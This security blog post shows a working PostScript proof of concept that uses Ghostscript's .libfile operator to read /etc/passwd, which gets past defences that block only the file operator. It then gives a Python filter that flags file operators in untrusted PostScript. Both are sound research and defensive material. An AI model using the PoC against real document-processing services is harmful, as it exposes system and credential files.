Just a short post to show a new method for reading files with PostScript. I suggest that you check out my post "Weaponizing PostScript" if the subject interests you.
There's an alternative method for reading files (thanks, Tavis Ormandy!).
I've modified Tavis's code a bit, and here's PoC code for reading files with .libfile:

    %!PS
    /Buf 1024 string def    % line buffer
    /Courier                % name the desired font
    8 selectfont            % choose the size in points and establish it as the current font
    /LM 72 def              % left margin
    /ypos 800 def           % current y position
    /lineheight 10 def      % height of a line
    /newline {
        ypos lineheight sub
        /ypos exch def
        LM ypos moveto
    } def
    LM ypos moveto
    (/etc/passwd) .libfile {
        {
            dup Buf readline
            {
                show
            }{
                showpage
                quit
            } ifelse
            % next line
            newline
        } loop
    } if

The lesson of the story is that you can't prevent local file disclosure just by blocking the file operator. The above code works with Ghostscript and ps2pdf version 9.06 (the latest version in the Debian stable branch at the time of writing this post).
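
To make that lesson concrete from the defender's side, here is an added example (not code from this post or from Tavis) of a token-level pre-filter for submitted PostScript. The watch list, the function names and the shortened sample are assumptions made for illustration; the sample shows that a filter watching only `file` lets the PoC through, while one that also knows `.libfile` flags it.

```python
# Constructed watch list: standard PostScript file operators plus the
# Ghostscript-specific .libfile from the post. Not exhaustive.
FILE_OPERATORS = {"file", "run", "deletefile", "renamefile",
                  "filenameforall", ".libfile"}
DELIMS = "()<>[]{}/%"

def tokens(ps):
    """Yield (line_number, token) for each name or number in the source,
    skipping comments and string literals so quoted text is not flagged."""
    i, n = 0, len(ps)
    while i < n:
        c = ps[i]
        if c == "%":                         # comment runs to end of line
            while i < n and ps[i] != "\n":
                i += 1
        elif c == "(":                       # string literal, parens may nest
            depth = 0
            while i < n:
                if ps[i] == "\\":
                    i += 1                   # skip the escaped character
                elif ps[i] == "(":
                    depth += 1
                elif ps[i] == ")":
                    depth -= 1
                i += 1
                if depth == 0:
                    break
        elif c.isspace() or c in DELIMS:
            i += 1
        else:
            start = i
            while i < n and not ps[i].isspace() and ps[i] not in DELIMS:
                i += 1
            yield ps.count("\n", 0, start) + 1, ps[start:i]

def flag_file_access(ps, watch=FILE_OPERATORS):
    """Return (line, operator) for every watched operator name in the input."""
    return [(ln, tok) for ln, tok in tokens(ps) if tok in watch]

# Constructed sample: a shortened form of the PoC above.
SAMPLE = """%!PS
/Buf 1024 string def % line buffer
(/etc/passwd) .libfile {
  { dup Buf readline { show } { showpage quit } ifelse } loop
} if
"""

if __name__ == "__main__":
    print("file-only filter:", flag_file_access(SAMPLE, {"file"}))
    print("extended filter: ", flag_file_access(SAMPLE))
```

A hit from a filter like this is a triage signal for untrusted input, not a guarantee, because any name list can be incomplete in the same way the file-only list is; the interpreter should still run isolated from files it has no need to read.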